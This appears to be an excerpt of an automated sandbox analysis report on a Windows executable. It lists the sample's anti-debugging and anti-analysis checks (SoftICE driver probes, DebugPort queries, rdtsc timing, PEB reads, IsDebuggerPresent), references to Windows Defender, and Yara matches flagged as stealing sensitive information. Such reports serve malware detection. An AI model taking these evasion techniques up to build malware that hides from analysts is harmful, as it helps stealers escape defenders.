Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F2B1C rdtsc 1_2_005F2B1C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 1_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007A76 mov eax, dword ptr fs:[00000030h] 1_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10005F25 mov eax, dword ptr fs:[00000030h] 1_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04787D41 push dword ptr fs:[00000030h] 1_2_04787D41
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04930D90 mov eax, dword ptr fs:[00000030h] 1_2_04930D90
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493092B mov eax, dword ptr fs:[00000030h] 1_2_0493092B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402EE0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 1_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00409A2A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040A58A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A720 SetUnhandledExceptionFilter, 1_2_0040A720
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_100056A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_10002FDA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04939C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_04939C91
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0493A7F1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0493D04A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493A987 SetUnhandledExceptionFilter, 1_2_0493A987
Source: file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Program Manager
Source: file.exe Binary or memory string: d+4Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A2EC cpuid 1_2_0040A2EC
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_00410822
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY